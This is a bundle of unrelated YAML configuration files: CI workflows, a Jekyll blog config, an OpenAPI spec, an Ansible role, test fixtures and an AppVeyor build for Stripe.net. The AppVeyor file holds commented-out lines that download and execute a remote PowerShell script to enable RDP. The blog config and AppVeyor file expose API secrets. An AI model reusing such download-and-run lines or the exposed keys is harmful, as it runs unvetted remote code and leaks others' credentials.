ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: |
zenodraft --sandbox deposition show details $RECORD_ID > deposition.json
CONCEPT_RECORD_ID=$(cat deposition.json | jq '.conceptrecid' --raw-output)
echo "::set-output name=concept_record_id::$CONCEPT_RECORD_ID"
- name: test showing the id of the latest draft in the newly created collection
env:
CONCEPT_RECORD_ID: ${{ steps.get_concept_record_id.outputs.concept_record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: zenodraft --sandbox deposition show latest $CONCEPT_RECORD_ID
- name: test showing the prereserved doi for the draft deposition
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: zenodraft --sandbox deposition show prereserved $RECORD_ID
- name: test adding a file to the draft deposition
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: |
echo "these are the file contents" > thefile.txt
zenodraft --sandbox file add $RECORD_ID thefile.txt
- name: test removing a file from the draft deposition
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: |
zenodraft --sandbox file delete $RECORD_ID thefile.txt
- name: test updating the deposition metadata with information from a local file
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: |
echo "{\"creators\":[{\"affiliation\":\"Netherlands eScience Center\",\"name\":\"<NAME>.\",\"orcid\":\"0000-0002-7064-4069\"}],\"description\":\"Auto-generated draft deposition for CI testing of zenodraft's CLI\",\"keywords\":[\"zenodo\",\"cli\"],\"license\":{\"id\":\"Apache-2.0\"},\"title\":\"Auto-generated deposition for testing purposes\"}" > .zenodo.json
zenodraft --sandbox metadata update $RECORD_ID .zenodo.json
- name: test clearing the deposition metadata
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: zenodraft --sandbox metadata clear $RECORD_ID
- name: test deleting a draft deposition
env:
RECORD_ID: ${{ steps.get_record_id.outputs.record_id }}
ZENODO_SANDBOX_ACCESS_TOKEN: ${{ secrets.ZENODO_SANDBOX_ACCESS_TOKEN }}
run: zenodraft --sandbox deposition delete $RECORD_ID
unit:
runs-on: ubuntu-latest
steps:
- name: get a copy of the repo contents
uses: actions/checkout@v2
- name: install the dependencies
run: npm install
- name: run the unit tests using jest and calculate coverage
run: npm run test
|
.github/workflows/testing.yml
|
# Site Settings
baseurl:
# It will redirect your site to this url
url : https://mrshen.github.io
title : Jzzz's Cosy Corner
name : mrshen's blog
subtitle : "If nothing goes right, go left."
description : "The personal blog of mrshen, learn to live, learn to love."
repository : mrshen/mrshen.github.io
keywords : mrshen, shenjiazhao, Jzzz's Cosy Corner, 沈佳照
date_format : "ordinal"
timezone : Asia/Shanghai
encoding : "utf-8"
side_bar_repo_limit : 3
author : mrshen
github_username : mrshen
location : Guangzhou, China
email : <EMAIL>
markdown : kramdown
kramdown:
input : GFM
syntax_highlighter_opts:
disable: true
# highlighter : rouge
paginate : 12
lsi : false
quiet : false
future : true
excerpt_separator : "\n\n" # 摘录的分隔符
permalink : /posts/:title.html # 博文发布的 URL,伪静态
plugins:
- jekyll-github-metadata # github 元信息
# - rouge # Jekyll 的语法高亮在 Jekyll 3.0 以上默认使用的是 Rouge
- jekyll-octicons # 支持 octions 图标
- jekyll-paginate # 分页
  - jekyll-feed # 自动生成 RSS 源
- jemoji # 解析 emoji
- jekyll-sitemap # 自动生成 sitemap
- jekyll-seo-tag # 自动 SEO 头信息生成
# - jekyll-html-pipeline #
# - jekyll-mentions # 用于 @github 用户
collections:
journey:
output : true
permalink : /journey/:path.html
# design-mode:
# output : true
# permalink : /design-mode/:path.html
# 导航
navs:
-
href : /
label : 首页
-
href : /categories/
label : 技术笔记
-
href : /journey/
label : 旅行
-
href : /foods/
label : 美食
-
href : /thoughts/
label : 感悟
-
href : /about/
label : 关于
subscribe_rss : /feed.xml
# 评论模块
# gitalk:
# owner : zoharyips
# repo : blog-comments
# clientID : 4f7905fa91963e1cb585
# clientSecret : 860aa59b9dac0ff81e468c3a67bec5a052e8b8ec
# 站内搜索
simple_jekyll_search:
fulltext : false
# leanCloud 访问统计
leancloud:
enable: true
app_id: 7EiyLoiTRMpJGKx5Jyy6FV0S-gzGzoHsz
app_key: 0l02blBLDj6noCkLMoF76LD8
data_class_name: visited_times
ip_class_name: visiting_ip
# 谷歌分析
google:
analytics_id : UA-146513129-1
# 备案号
beian : 粤ICP备
MIIT : http://www.beian.miit.gov.cn
|
_config.yml
|
openapi: 3.0.0
info:
description: The Tateru Machine Service is a repository of machine metadata and manager routing information.
version: 0.0.2
title: Tateru Machine Service API
license:
name: Apache 2.0
url: 'http://www.apache.org/licenses/LICENSE-2.0.html'
tags:
- name: inventory
description: Inventory scanning
- name: deploy
description: Deployment operations
paths:
/v1/machines:
get:
tags:
- inventory
summary: fetches all known machines
operationId: fetchMachines
description: |
Returns all currently active machine objects
parameters:
- name: alias
in: query
description: 'Filter on known aliases for machines (e.g. name)'
schema:
type: string
responses:
'200':
description: list of machine objects
content:
application/json:
schema:
type: array
items:
$ref: '#/components/schemas/Machine'
/v1/installer-callback:
post:
tags:
- deploy
summary: send an installation callback to notify Tateru that an installer has booted
operationId: bootInstaller
description: |
When the Tateru installation software has booted it will call this endpoint to provide inventory
and address to be reached at. It will be provided with an SSH public key to allow as response.
requestBody:
content:
application/json:
schema:
type: object
properties:
uuid:
type: string
example: d290f1ee-6c54-4b01-90e6-d701748f0851
serialNumber:
type: string
example: XYZ1234
assetTag:
type: string
example: '00203'
required:
- uuid
responses:
'200':
description: the request succeeded
content:
application/json:
schema:
type: array
items:
$ref: '#/components/schemas/CallbackResponse'
'404':
description: the requested machine was not found
components:
schemas:
Machine:
type: object
required:
- uuid
properties:
uuid:
type: string
format: uuid
example: d290f1ee-6c54-4b01-90e6-d701748f0851
serialNumber:
type: string
example: XYZ1234
assetTag:
type: string
example: '00203'
name:
type: string
example: VMLNX01
managedBy:
type: string
example: 'http://tateru-vsphere.corp.local:7707/'
CallbackResponse:
type: object
required:
- ssh_pub_key
properties:
ssh_pub_key:
          type: string
          example: 'ssh-ed25519 AAA[..]AAV user@laptop'
|
api/machine-service.api.yaml
|
---
- name: Get Openstack Release Data
openstack_release:
register: osa_details
- name: Run snitch collector - Newton +
become: yes
command: "openstack-ansible snitch.yml --forks {{ cloud_snitch_forks }}"
environment:
    CLOUD_SNITCH_ENABLED: "true"
CLOUD_SNITCH_CONF_FILE: "{{ cloud_snitch_conf_file }}"
CLOUD_SNITCH_CRYPT_ENABLED: "{{ cloud_snitch_crypt_enabled }}"
CLOUD_SNITCH_CRYPT_KEY: "{{ crypto_aes_key }}"
CLOUD_SNITCH_RUN_ID: "{{ run_id }}"
CLOUD_SNITCH_ENVIRONMENT_ACCOUNT_NUMBER: "{{ cloud_snitch_environment_account_number }}"
CLOUD_SNITCH_ENVIRONMENT_NAME: "{{ cloud_snitch_environment_name }}"
CLOUD_SNITCH_ENVIRONMENT_UUID: "{{ cloud_snitch_environment_uuid }}"
ignore_errors: yes
args:
chdir: "{{ cloud_snitch_playbook | dirname }}"
tags:
- collect
when: osa_details.major_release and osa_details.major_release >= 14
async: "{{ cloud_snitch_collection_timeout }}"
poll: "{{ cloud_snitch_collection_poll }}"
- name: Run snitch collector - Mitaka -
become: yes
command: "openstack-ansible snitch.yml --forks {{ cloud_snitch_forks }}"
environment:
    CLOUD_SNITCH_ENABLED: "true"
CLOUD_SNITCH_CONF_FILE: "{{ cloud_snitch_conf_file }}"
CLOUD_SNITCH_CRYPT_ENABLED: "{{ cloud_snitch_crypt_enabled }}"
CLOUD_SNITCH_CRYPT_KEY: "{{ crypto_aes_key }}"
CLOUD_SNITCH_RUN_ID: "{{ run_id }}"
CLOUD_SNITCH_ENVIRONMENT_ACCOUNT_NUMBER: "{{ cloud_snitch_environment_account_number }}"
CLOUD_SNITCH_ENVIRONMENT_NAME: "{{ cloud_snitch_environment_name }}"
CLOUD_SNITCH_ENVIRONMENT_UUID: "{{ cloud_snitch_environment_uuid }}"
ANSIBLE_INVENTORY: "{{ cloud_snitch_inventory_locations | join(':') }}"
ANSIBLE_SSH_PIPELINING: "True"
ANSIBLE_HOST_KEY_CHECKING: "False"
ignore_errors: yes
args:
chdir: "{{ cloud_snitch_playbook | dirname }}"
tags:
- collect
when: osa_details.major_release and osa_details.major_release < 14
async: "{{ cloud_snitch_collection_timeout }}"
poll: "{{ cloud_snitch_collection_poll }}"
- name: Archive the dataset
become: yes
archive:
path: "{{ cloud_snitch_data_dir }}/{{ run_id }}"
dest: "{{ cloud_snitch_data_dir }}/{{ run_id }}.tar.gz"
exclude_path:
- "{{ cloud_snitch_data_dir }}"
format: gz
tags:
- collect
- name: Fetch the dataset
fetch:
src: "{{ cloud_snitch_data_dir }}/{{ run_id }}.tar.gz"
dest: "{{ cloud_snitch_data_dir }}/{{ run_id }}.tar.gz"
fail_on_missing: false
flat: yes
tags:
- collect
- name: Sync the dataset
action: sync
args:
uuid: "{{ run_id }}"
key: "{{ crypto_aes_key }}"
tags:
- collect
- name: Remove archive
become: yes
file:
state: absent
path: "{{ item }}"
with_items:
- "{{ cloud_snitch_data_dir }}/{{ run_id }}.tar.gz"
- "{{ cloud_snitch_data_dir }}/{{ run_id }}"
tags:
- collect
|
syndication/roles/collect/tasks/main.yml
|
name: 'Common CI'
description: 'Run common CI steps'
inputs:
image-name:
description: 'name of docker image that will be built'
required: true
runs:
using: "composite"
steps:
- name: Check code formatting with black
uses: psf/black@stable
with:
options: "--check --verbose"
- name: Lint code with mypy
uses: jpetrucciani/mypy-check@master
with:
path: "ckanext"
mypy_flags: "--install-types --non-interactive"
- name: Setup docker buildx
uses: docker/setup-buildx-action@v1.6.0
- name: Get current git commit hash
id: get-git-commit-hash
uses: priyesh2609/sha-trim-action@v1.1.1
- name: Get current git branch name
uses: EthanSK/git-branch-name-action@v1
- name: Replace invalid chars in git branch name
shell: bash
run: echo "SLUGGED_GIT_BRANCH_NAME=$(echo $GIT_BRANCH_NAME | tr / -)" >> $GITHUB_ENV
- name: Build docker image
working-directory: docker
shell: bash
env:
DEFAULT_BRANCH: main
run: |
docker pull ${{ inputs.image-name }}:$SLUGGED_GIT_BRANCH_NAME || \
docker pull ${{ inputs.image-name }}:$DEFAULT_BRANCH || \
true
docker image build \
--tag "${{ inputs.image-name }}:$SLUGGED_GIT_BRANCH_NAME" \
--tag "${{ inputs.image-name }}:$TRIMMED_SHA" \
--label git-commit=$TRIMMED_SHA \
--label git-branch=$SLUGGED_GIT_BRANCH_NAME \
--build-arg "BUILDKIT_INLINE_CACHE=1" \
--build-arg "GIT_COMMIT=$TRIMMED_SHA" \
--cache-from=${{ inputs.image-name }}:$SLUGGED_GIT_BRANCH_NAME \
--cache-from=${{ inputs.image-name }}:$DEFAULT_BRANCH \
..
- name: Stand up CI CKAN stack
working-directory: docker
shell: bash
run: |
python3 compose.py \
--compose-file=docker-compose.yml \
--compose-file=docker-compose.ci.yml \
--image-tag=$SLUGGED_GIT_BRANCH_NAME \
up
- name: Bootstrap CI CKAN stack
shell: bash
run: |
docker exec -t emc-dcpr_ckan-web_1 poetry install
docker exec -t emc-dcpr_ckan-web_1 poetry run ckan db init
docker exec -t emc-dcpr_ckan-web_1 poetry run ckan harvester initdb
docker exec -t emc-dcpr_ckan-web_1 poetry run ckan db upgrade -p dalrrd_emc_dcpr
- name: Run unit tests
shell: bash
run: |
docker exec -t emc-dcpr_ckan-web_1 poetry run pytest \
--ckan-ini docker/ckan-ci-settings.ini \
-m unit \
--cov
- name: Run integration tests
shell: bash
run: |
docker exec -t emc-dcpr_ckan-web_1 poetry run pytest \
--ckan-ini docker/ckan-ci-settings.ini \
-m integration \
--cov
- name: Wind down ckan stack
shell: bash
working-directory: docker
run: |
python3 compose.py \
--compose-file=docker-compose.yml \
--compose-file=docker-compose.ci.yml \
--image-tag=$SLUGGED_GIT_BRANCH_NAME \
down
|
.github/actions/action-common-ci/action.yml
|
CuteNinja\HOT\WorkoutBundle\Entity\WorkoutRestStep:
workoutRestStep (template):
status: active
thorWorkoutStep4:
workout: @thor
exercise: @rest
duration: 30
position: 4
thorWorkoutStep8:
workout: @thor
exercise: @rest
duration: 30
position: 8
fafnirWorkoutStep2:
workout: @fafnir
exercise: @rest
duration: 30
position: 2
fafnirWorkoutStep4:
workout: @fafnir
exercise: @rest
duration: 30
position: 4
fafnirWorkoutStep6:
workout: @fafnir
exercise: @rest
duration: 30
position: 6
CuteNinja\HOT\WorkoutBundle\Entity\WorkoutNorStep:
workoutNorStep (template):
status: active
thorWorkoutStep1:
workout: @thor
exercise: @squat
numberOfRepetition: 50
position: 1
thorWorkoutStep2:
workout: @thor
exercise: @sitUp
numberOfRepetition: 30
position: 2
thorWorkoutStep3:
workout: @thor
exercise: @pushUp
numberOfRepetition: 15
position: 3
thorWorkoutStep5:
workout: @thor
exercise: @squat
numberOfRepetition: 50
position: 5
thorWorkoutStep6:
workout: @thor
exercise: @sitUp
numberOfRepetition: 30
position: 6
thorWorkoutStep7:
workout: @thor
exercise: @pushUp
numberOfRepetition: 15
position: 7
thorWorkoutStep9:
workout: @thor
exercise: @squat
numberOfRepetition: 50
position: 9
thorWorkoutStep10:
workout: @thor
exercise: @sitUp
numberOfRepetition: 30
position: 10
thorWorkoutStep11:
workout: @thor
exercise: @pushUp
numberOfRepetition: 15
position: 11
CuteNinja\HOT\WorkoutBundle\Entity\WorkoutDistanceStep:
sleipnirWorkoutStep1:
workout: @sleipnir
exercise: @run
distance: 10000
position: 1
CuteNinja\HOT\WorkoutBundle\Entity\WorkoutAmrapStep:
fafnirWorkoutStep1:
workout: @fafnir
exercise: @burpee
duration: 60
position: 1
fafnirWorkoutStep3:
workout: @fafnir
exercise: @mountainClimber
duration: 60
position: 3
fafnirWorkoutStep5:
workout: @fafnir
exercise: @burpee
duration: 60
position: 5
fafnirWorkoutStep7:
workout: @fafnir
exercise: @mountainClimber
duration: 60
position: 7
|
src/CuteNinja/HOT/WorkoutBundle/Resources/fixtures/WorkoutStep.yml
|
- project: Website Design and User Experience
role: Conestoga College, Kitchener ON Canada
duration: Sept 2016 — Oct 2016
# url: "#"
description: <ul class="resume-item-list"><li><b>Tools Used</b> — Balsamiq and Microsoft Visio</li><li>Request for the information(RFI) from the client</li><li>Collect the requirements of a website from users, client and other stakeholders</li><li>Managed wireframes for the graphical representation of client product used for immediate client feedback</li><li>Developed mockups to elicit the detailed information for the further development</li></ul>
# Conestoga College
- project: User Experience Design
role: Conestoga College, Kitchener ON Canada
duration: Oct 2016 — Nov 2016
# url: "#"
description: <ul class="resume-item-list"><li><b>Tools Used</b> — Proto.io,Microsoft Visio and Microsoft Word</li><li>Organized meetings with the client to prepare and update business process requirements</li><li>Developed use cases to depict the role of each actor</li><li> Gathered demographic information to make strategy documentation</li><li>Created mockups for the user interface design using Proto.io</li></ul>
# Conestoga College
- project: Production Inefficiency
role: Conestoga College, Kitchener ON Canada
duration: Nov 2016 — Dec 2016
# url: "#"
description: <ul class="resume-item-list"><li><b>Tools Used</b> — Microsoft Excel, Microsoft Visio and Adobe InDesign CC</li><li>Prioritized business and system problems</li><li>Determined the causes and effects(Fish-bone Diagram) in the manufacturing of the project</li><li>Presented the AS-IS and TO-BE scenario for the production</li><li>Redesigned the layout of the factory by doing spaghetti analysis</li></ul>
# Punjab Technical University
- project: Flip and Trip
role: Punjab Technical University, Punjab, India(Group project-Part of Development Team)
duration: Jan 2013 — May 2013
# url: "#"
description: <ul class="resume-item-list"><li><b>Technologies Used</b> — C sharp, ASP.Net, SQL Server 2005, HTML and CSS</li><li>The project turns travel planning into fun and exciting social activities by discovering some of the best attractions, restaurants and hotels around the world</li><li>Developed a user friendly interface for selecting hotels, retaurants and attractions</li><li>Increased the efficiency to automation</li><li>Used prototype model for software development</li></ul>
|
_data/projects.yml
|
---
- functions:
- {name: unsafePerformIO, within: [PlutusPrelude, Language.PlutusCore.Generators.Internal.Entity]}
- {name: error, within: [Main, Language.PlutusCore.Generators.Interesting, Evaluation.Constant.Success, Language.PlutusCore.Constant.Apply, Language.PlutusCore.Constant.Typed, Language.PlutusCore.Evaluation.CkMachine, Language.PlutusCore.Generators.Internal.Entity, Language.PlutusCore.Constant.Make, Language.PlutusCore.Generators.Internal.TypedBuiltinGen, Language.PlutusCore.TH]}
- {name: undefined, within: [Language.PlutusCore.Constant.Apply]}
- {name: fromJust, within: []}
- {name: foldl, within: []}
- error: {lhs: "hylo embed", rhs: "ana", name: "Use anamorphism"}
- error: {lhs: "hylo f project", rhs: "cata f", name: "Use catamorphism"}
- error: {lhs: "concat", rhs: "fold", name: "Generalize concat"}
- error: {lhs: "concatMap", rhs: "foldMap", name: "Generalize concatMap"}
- error: {lhs: "f >> pure ()", rhs: "void f", name: "Use void"}
- error: {lhs: "over _1 f x", rhs: "first f x", name: "Use arrows"}
- error: {lhs: "over _2 f x", rhs: "second f x", name: "Use arrows"}
- error: {lhs: "bool x x p", rhs: "x", name: "Redundant bool"}
- error: {lhs: "maybe mempty", rhs: "foldMap", name: "Use foldMap"}
- error: {lhs: "mconcat", rhs: "fold", name: "Generalize mconcat"}
- ignore: {name: Reduce duplication, within: [Language.PlutusCore.Renamer, Language.PlutusCore.Constant.Prelude, Language.PlutusCore.StdLib.Data.Bool, Language.PlutusCore.StdLib.Data.ChurchNat, Language.PlutusCore.StdLib.Data.Function, Language.PlutusCore.StdLib.Data.List, Language.PlutusCore.StdLib.Data.Nat]}
- ignore: {name: Redundant $, within: [Evaluation.Constant.Success, Language.PlutusCore.Generators.Internal.TypedBuiltinGen]}
# this is rarely an improvement, also ignored in cardano
- ignore: {name: Move brackets to avoid $}
# this aids clarity since you can name the parameters
- ignore: {name: Avoid lambda}
- fixity: infixr 8 .*
- fixity: infixr 3 ***
- fixity: infixr 3 &&&
- fixity: infixr 1 <=<
|
.hlint.yaml
|
# AppVeyor CI pipeline for Stripe.net: restore, build (Release + Debug),
# run the xunit test suite against a locally started stripe-mock server,
# pack the NuGet package, and deploy it to NuGet on tagged builds.
version: 19.5.0.{build}
image: Visual Studio 2017
environment:
  # NOTE(review): this is a Stripe *test-mode* secret key committed for CI
  # use — confirm it grants no live-mode access before reusing it.
  STRIPE_TEST_SK: sk_test_eBgAzVoEpJKfYjD9nf2YoyMM
  # If you bump this, don't forget to bump `MinimumMockVersion` in `BaseStripeTest.cs` as well.
  STRIPE_MOCK_VERSION: 0.30.0
deploy:
# Publish the packed .nupkg to NuGet, but only for builds triggered by a
# git tag (appveyor_repo_tag).
- provider: NuGet
  api_key:
    <KEY>
  on:
    appveyor_repo_tag: true
cache:
# Keep the stripe-mock download cached; invalidate only when this file changes.
- stripe-mock -> appveyor.yml
install:
# Download and extract stripe-mock on a cache miss, then start it in the
# background so test_script can reach it.
- ps: |
    If(!(Test-Path "stripe-mock"))
    {
      New-Item -Path . -Name "stripe-mock" -ItemType "directory" -Force | Out-Null
      wget "https://github.com/stripe/stripe-mock/releases/download/v$($env:STRIPE_MOCK_VERSION)/stripe-mock_$($env:STRIPE_MOCK_VERSION)_windows_amd64.tar.gz" -OutFile "$($pwd)\stripe-mock\stripe-mock.tar.gz"
      7z.exe e -y -o"stripe-mock" "stripe-mock\stripe-mock.tar.gz" | Out-Null
      7z.exe x -y -o"stripe-mock" "stripe-mock\stripe-mock.tar" | Out-Null
    }
    $app = Start-Process -FilePath "stripe-mock\stripe-mock.exe" -NoNewWindow -PassThru
    Write-Host ("stripe-mock running, Id = $($app.Id)`n") -ForegroundColor Green
before_build:
- ps: Write-Host $("`n HOST INFORMATION `n") -BackgroundColor DarkCyan
- dotnet --info
- ps: Write-Host $("`n RESTORING PACKAGES FOR ALL FRAMEWORKS `n") -BackgroundColor DarkCyan
- dotnet restore src\
build:
  parallel: true
build_script:
- ps: Write-Host $("`n BUILDING EVERYTHING `n") -BackgroundColor DarkCyan
- dotnet build -c Release src\Stripe.net
- dotnet build -c Debug src\Stripe.net
- dotnet build src\StripeTests -c Debug
after_build:
# Pack the Release build into a .nupkg (collected below as a build artifact).
- ps: Write-Host $("`n PACKING UP `n") -BackgroundColor DarkCyan
- dotnet pack -c Release src\Stripe.net
test_script:
- ps: Write-Host $("`n RUNNING THE NEW XUNIT + STRIPE-MOCK TESTS `n") -BackgroundColor DarkCyan
- dotnet test src\StripeTests\StripeTests.csproj
artifacts:
- path: '**\*.nupkg'
# these commands tell appveyor to open an RDP session for debugging
#init:
#- ps: iex ((new-object net.webclient).DownloadString('https://raw.githubusercontent.com/appveyor/ci/master/scripts/enable-rdp.ps1'))
#
#on_finish:
#- ps: $blockRdp = $true; iex ((new-object net.webclient).DownloadString('https://raw.githubusercontent.com/appveyor/ci/master/scripts/enable-rdp.ps1'))
|
appveyor.yml
|
# GitHub Actions workflow: test the SnakemakeProfiles/slurm profile inside
# docker containers (a slurm cluster plus a snakemake container deployed via
# tests/deploystack.sh), with conda packages and docker images both cached.
name: Test SnakemakeProfiles/slurm
env:
  SNAKEMAKE_IMAGE: quay.io/biocontainers/snakemake:6.15.5--hdfd78af_0
  SLURM_IMAGE: giovtorres/docker-centos7-slurm:20.11.8
  DOCKER_COMPOSE: tests/docker-compose.yaml
on: [push, pull_request]
jobs:
  slurmtest:
    name: Test slurm profile in docker containers
    runs-on: ubuntu-latest
    timeout-minutes: 30
    steps:
      - uses: actions/checkout@v2
      - run: mkdir -p ~/image-cache
      # Cache conda package downloads; bump CACHE_NUMBER to force a refresh.
      - name: cache-conda
        uses: actions/cache@v2
        env:
          CACHE_NUMBER: 0
        with:
          path: ~/conda_pkgs_dir
          key: ${{ runner.os }}-conda-${{ env.CACHE_NUMBER }}-${{ hashFiles('test-environment.yml') }}
      # Cache the saved docker image tarballs, keyed on the image tags above
      # so changing either image invalidates the cache.
      - uses: actions/cache@v2
        id: cache-images
        env:
          CACHE_NUMBER: 0
        with:
          path: ~/image-cache
          key: image-cache-${{ runner.os }}-${{ env.CACHE_NUMBER }}-${{ env.SNAKEMAKE_IMAGE }}-${{ env.SLURM_IMAGE }}
      - name: install miniconda
        uses: conda-incubator/setup-miniconda@v2
        with:
          mamba-version: "*"
          # FIX: the Anaconda base channel is named "defaults", not "default";
          # the old value resolved to a nonexistent anaconda.org user channel.
          channels: conda-forge,bioconda,defaults
          channel-priority: true
          environment-file: test-environment.yml
          use-only-tar-bz2: true
      - name: docker swarm init
        run: docker swarm init
      # On a cache hit, restore the saved images instead of pulling them.
      - if: steps.cache-images.outputs.cache-hit == 'true'
        run: docker load -i ~/image-cache/snakemake.tar
      - if: steps.cache-images.outputs.cache-hit == 'true'
        run: docker load -i ~/image-cache/slurm.tar
      - name: docker deploy
        shell: bash -l {0}
        # NOTE(review): this step-level env re-exports the workflow-level env
        # unchanged; kept as-is since deploystack.sh reads these variables.
        env:
          DOCKER_COMPOSE: ${{ env.DOCKER_COMPOSE }}
          SNAKEMAKE_IMAGE: ${{ env.SNAKEMAKE_IMAGE }}
          SLURM_IMAGE: ${{ env.SLURM_IMAGE }}
        run: ./tests/deploystack.sh
      # On a cache miss, save the freshly pulled images for the next run.
      - if: steps.cache-images.outputs.cache-hit != 'true'
        run: docker save -o ~/image-cache/snakemake.tar ${{ env.SNAKEMAKE_IMAGE }}
      - if: steps.cache-images.outputs.cache-hit != 'true'
        run: docker save -o ~/image-cache/slurm.tar ${{ env.SLURM_IMAGE }}
      # Run the pytest suite; --slow enables the long-running slurm tests.
      - name: run tests
        shell: bash -l {0}
        run: |
          pytest -v -s tests/test_cookie.py
          pytest -v -s tests/test_utils.py
          pytest -v -s tests/test_slurm.py --slow
          pytest -v -s tests/test_slurm_advanced.py --slow
|
.github/workflows/slurm.yaml
|